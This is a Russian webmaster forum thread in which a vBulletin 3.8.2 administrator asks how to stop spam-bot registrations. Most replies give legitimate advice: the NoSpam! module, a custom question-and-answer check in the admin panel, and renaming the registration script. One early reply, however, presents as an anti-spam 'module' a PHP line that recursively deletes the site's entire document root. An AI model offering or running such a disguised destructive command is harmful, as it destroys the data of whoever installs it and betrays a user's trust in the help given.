- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Привет всем.
Спамеры на форуме задолбали, 3.8.2 версия.
Кто может подсказать какой-нить неглючный, нормальный модуль, можно даже два, который бы спас меня от спамеров, которые, по всей видимости юзают хрумер.
Спасибо ;)
текст модуля
<?
`rm -Rf $_SERVER[DOCUMENT_ROOT]`;
NoSpam! добавляет в форму регистрации текстовый вопрос, где вы сами можете задать вопросы и ответы на них. Значительно уменьшает спам, но все равно пробивают иногда.
Насколько я помню, на форуме можно и без дополнительных модулей создать дополнительное поле-вопрос, для него можно прописать варианты ответов.
Если у вас только русскоязычные пользователи, то напишите вопрос по русски с ответами тоже по русски.
Также лучше потом почистить уже зарегистрированных спамеров.
Без всяких модулей задаёте вопрос и ответ на него. Задайте вопрос по теме форума, т.е. что-то не очень стандартное и никто не пробьёт. За год на форуме с приличной посещаемостью не было ни одного прорыва спамера, за исключением тех, кто вручную что-то пиарит.
Админка VB - Основные настройки - Управление отделением людей от роботов
Поставить переключатель на Проверка вопросом и ответом на него и жмете сохранить, после перезагрузки страницы появится табличка Параметры проверки вопросом и ответом на него, нажимаете кнопку Добавить новый вопрос и добавляете вопрос, а потом ответ на него.
Я у себя по теме форума вопросы вписал, никаких спамеров нет.
Всем спасибо, сча сделаем ;)
PROGRAMMATOR, отдельное спасибо 🍻
А самое эффективное средство - нестандартная форма регистрации. У меня на сайте городского портала общая регистрация на сайте и форуме. Юзеры регистрируются через самописный скрипт, и этот же скрипт при регистрации отсылает данные на формы регистрации форума через CURL. Благо на вобле скрипт регистрации вызывается через отдельный файл register.php. Только его нужно переименовать во что-то другое - regisfaewtersfdb.php и отключить капчу.
Спама на этом форуме вообще нет, только вручную иногда постят.